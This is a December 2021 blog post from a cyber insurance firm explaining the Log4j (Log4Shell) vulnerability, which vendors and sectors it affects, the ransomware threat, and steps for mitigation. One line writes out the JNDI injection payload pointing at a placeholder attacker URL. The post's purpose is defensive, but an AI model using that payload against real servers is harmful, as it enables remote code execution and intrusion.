Why did Log4j cause the Internet’s fire alarm to go off?

by | Dec 17, 2021 | Cyber Risk

Understanding the Log4j Vulnerability

Over the last week IT administrators, security professionals, C-Suites, and government entities have been scrambling to respond to a cybersecurity vulnerability that has exposed much of the internet’s computer networks. This vulnerability is widespread spanning economic sectors and affecting computer infrastructures across international borders. Critical industries are also at risk of exposure including manufacturing, transportation, healthcare, electricity infrastructure, and software vendors.

Researchers and security professionals estimate hundreds of millions of devices are exposed, giving hackers, cybercriminal groups, and foreign governments the opportunity to target computer systems to run remote code execution (RCE), take over servers, deploy ransomware, and exfiltrate sensitive data.

What is Log4j

Log4j is freely distributed (open-source) by Apache Software Foundation. It is downloaded millions of times and is among the most popular tools for collecting information on websites, applications and computer networks. It’s a Java-based logging framework, developers use Log4j framework to record application behavior and user activity on computers. The open-source software is extremely popular with commercial software developers running across all platforms Windows, Apple OS, Linux. It’s used in everything from medical devices, websites, servers, and countless applications.

How can bad actors compromise systems from the Log4j vulnerability?

Bad actors have the ability to run a remote code execution on exposed computer systems. This means they’ll be able to take control of systems, install malicious software like ransomware, and exfiltrate data. This is particularly concerning to security experts since it’s so easily exploitable. Hackers with little to no knowledge can easily seize control of web servers, industrial control systems, and consumer devices.

Log4Shell injection is a Java Naming and Directory Interface (JNDI) injection, which allows for unauthenticated remote code execution in the Apache Log4j2 library. The hacker can utilize it by changing the user agent in a browser to this syntax: ${jndi:ldap://[BadGuy_URL]} 

This string will sit in the user’s web server logs and return a request to the attacker’s URL when the Log4j library analyzes it. This string is then used to send commands to the exposed computer system.

While attackers are exploiting this vulnerability with botnets and deploying cryptojacking techniques, the biggest threat to organizations is the deployment of ransomware. Security researchers have already identified an attempt from hackers to deploy a new ransomware family called Khonsari on systems exposed to the Log4j vulnerability. Adversaries will likely attempt to deploy many variants of ransomware to monetize from the Log4j vulnerability. This is why patching as soon as possible is critical for all organizations.

How widespread is the Log4j vulnerability?

The Cybersecurity and Infrastructure Security Agency states, hundreds of millions of devices are likely to be affected. Although ransomware may be the top threat for organizations to mitigate against, the concern for supply-chain attacks grows as exposure is widespread to software and technology vendors. The list of vulnerable technology suppliers continues to grow with many major players including Palo Alto Networks, Microsoft, Cloudflare, Oracle, and Amazon.

Many other vendors have investigated if they were impacted including:
Cisco, Citrix, Fortinet (Fortinet), F-Secure, IBM, Juniper Networks, Okta, McAfee, SolarWinds, SonicWall, Sophos, Zscaler

All of these technology vendors have issued advisories on patching and mitigating their exposed products.

How are organizations mitigating the exposure?

  • Organizations can reduce their risk by reducing their exposure to vulnerable software. First step is to determine whether the organization’s digital assets are using a vulnerable version of Log4j. This can be done by scanning jar, war, and ear files by searching for JndiLookup.class. If the search hits on any Log4j file which is prior to version 2.16.0, then it is most likely vulnerable to CVE-2021-44228.
  • To further determine exposure consult with all software vendors the organization is utilizing. It is important to reach out to all vendors to realize if their software products were exposed to Log4j vulnerability. If the vendor confirms there is exposure then look to follow their advisory steps on mitigation and patching for their product.
  • Apply updates and patches as soon as possible. Patching should be prioritized on all systems, network servers, internet-facing systems and applications, vendor software, and mission critical systems. Apache Log4j has provided guidance on patching here.
  • CISA recommends implementing a Web Application Firewall (WAF) with rules that automatically update to block any remote code execution signatures for Log4j, this way security professionals can focus on fewer alerts.
  • Security teams should look for unauthorized configuration changes on all systems and applications. This is accomplished by monitoring log files.
  • Segregate any compromised systems to an isolated VLAN. Determine firewall rules on the compromised hosts and the rules set for the rest of the organization.
  • Implement an end-point detection and response (EDR) solution to look for signs of anomalies or malicious activity. All network security should proactively block any indicators of the vulnerability and the EDR should be running on all servers.

What should be expected going forward?

Cyber threat actors are moving quickly to scan the internet for any Log4j vulnerabilities. They’re spending less time in a compromised network to launch an attack, giving organizations less time to identify the issue in the first place. The issue is widespread and organizations often aren’t able to move quickly enough to identify all of their digital assets to patch immediately. This is why organizations are advised to apply mitigation measures (see above) along with patching all known systems and software. The cyber threat landscape is vast and continues to evolve, organizations should be proactive in their approach to reducing their risk.


Related Posts

Cowbell Blog

Grow your cyber IQ with our insights into cyber insurance, cyber risk, and cyber security.

See How Cowbell Can Protect Your Business